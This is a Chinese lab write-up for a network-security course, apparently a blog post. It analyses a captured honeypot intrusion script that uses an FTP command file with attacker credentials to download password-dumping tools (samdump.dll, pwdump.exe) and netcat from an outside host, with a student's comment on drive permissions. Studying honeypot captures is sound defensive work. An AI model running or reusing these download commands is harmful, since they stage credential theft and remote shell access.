蜜罐网络攻击分析实验(网安实验7)

来自200.1.x.y(假设的IP的攻击者成功攻陷了一台部署有蜜罐系统的主机200.1.p.q(假设的IP,蜜罐主机记录了入侵过程,入侵数据经提取并经简化处理后的脚本代码如下所示。其中,www.unknown.net是假设的域名。

现在看看所示的一些捕获到的脚本,

           echo werd >> c:\fun

/* 发现不能在c盘中生成一个文件,但是如果切换成d盘就可以

在本机上进行c盘操作也是失败的:

 

在本机的C盘重定向被拒绝访问了。*/

           echo user johna2k > ftpcom

           echo hacker2000 >> ftpcom

           echo get samdump.dll >> ftpcom

           echo get pwdump.exe >> ftpcom

           echo get nc.exe>>ftpcom

           echo quit>>ftpcom

           ftp –s:ftpcom -n 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值